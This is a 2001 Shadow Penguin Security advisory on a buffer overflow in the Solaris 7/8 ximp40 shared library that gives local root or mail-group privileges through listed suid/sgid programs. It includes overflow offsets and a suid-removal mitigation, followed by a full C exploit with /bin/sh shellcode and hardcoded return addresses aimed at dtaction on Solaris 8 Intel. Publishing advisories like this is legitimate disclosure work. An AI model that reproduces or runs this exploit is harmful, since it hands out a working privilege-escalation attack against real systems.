[ SOURCE: http://www.secureroot.com/security/advisories/9809701761.html ] SPS Advisory #40 Solaris7/8 ximp40 shared library buffer overflow UNYUN Shadow Penguin Security (http://shadowpenguin.backsection.net) -------------------------------------------------------------- [Date] Jan. 30, 2001 [Vulnerable] Solaris 8 Intel & Sparc edition Solaris 7 Intel & Sparc edition [Not vulnerable] unknown [Overview] Shared library "ximp40" which is installed on Solaris7 and 8 by default has buffer overflow bug, the local user can obtain root privilege or mail gid by using the following suid/sgid programs which are using the shared library ximp40. *Solaris 8 suid root : /usr/dt/bin/dtaction suid root : /usr/dt/bin/dtprintinfo suid root : /usr/openwin/bin/sys-suspend sgid mail : /usr/dt/bin/dtmail sgid mail : /usr/openwin/bin/mailtool *Solaris 7 suid root : /usr/dt/bin/dtaction suid root : /usr/dt/bin/dtprintinfo suid root : /usr/dt/bin/dtappgather suid root : /usr/bin/admintool suid root : /usr/openwin/bin/sys-suspend sgid mail : /usr/dt/bin/dtmail sgid mail : /usr/openwin/bin/mailtool The exploitable buffer overflow occurs when the long string is specified to "arg0" of previous listed programs. This buffer overflow overwrites the stack area which includes RET address, EIP can be changed to the value which is specified inside arg0. [Details] We explain this problem by /usr/dt/bin/dtaction which is installed on Solaris8. This overflow becomes exploitable if the appropriate value is set in buffer offset 264 to 267, EIP can be changed to specified value which is located in buffer offset 260 to 263 [Avoidance] Clear the suid/sgid bit of all programs which are listed in [Overview]. [Caution] We will change this information without any notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatever arising out of or in connection with the use or spread of this information. Any use of this information is only for personal experiment. [Comments ?] If you have something comments, please send to following address.. UNYUN http://shadowpenguin.backsection.net [Sample code] This exploit obtain root privilege by using /usr/dt/bin/dtaction. This is tested on Solaris8 Intel edition only. /*==================================================================== Solaris ximp40 shared library exploit for Solaris8 Intel Edition The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) [usage] #xhost +targethost #telnet targethost ... %setenv DISPLAY yourhost:0.0 %gcc ximp40.c %./a.out 0:Default value 1:Calculated value > 1 <- Input 0 or 1 ==================================================================== */ #include #define BUF_SIZE 272 #define EIP_OFFSET 260 #define FAKE_OFFSET 264 #define FAKE_VALUE 0x08046dec #define EIP_VALUE 0x08047cb4 #define FAKE_VALUE_DIF 0xd9c #define EIP_VALUE_DIF 0x12c #define NOP 0x90 char shell_code[]= "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xc1" "\x88\x46\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x17\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89" "\x5e\x08\x53\xb0\x3b\xe8\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8\xff" "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff" "\xff\xff"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } void valset(char *p,unsigned int val) { *p=val&0xff; *(p+1)=(val>>8)&0xff; *(p+2)=(val>>16)&0xff; *(p+3)=(val>>24)&0xff; } main() { char buf[BUF_SIZE]; unsigned int esp=get_sp(),sw; memset(buf,NOP,BUF_SIZE); memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code, strlen(shell_code)); printf("esp=%x\n",esp); printf("0:Default value 1:Calculated value >"); fflush(stdout); scanf("%d",&sw); if (sw==0){ valset(buf+FAKE_OFFSET, FAKE_VALUE); valset(buf+EIP_OFFSET , EIP_VALUE); printf("Jumping address = %x\n",EIP_VALUE); }else{ valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF); valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF); printf("Jumping address = %x\n",esp+EIP_VALUE_DIF); } buf[BUF_SIZE-1]=0; execl("/usr/dt/bin/dtaction",buf,NULL); } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguin@backsection.net (SPS-Official) unyun@shadowpenguin.org (Personal) % eEye Digital Security Team [ http://www.eEye.com ] unyun@eEye.com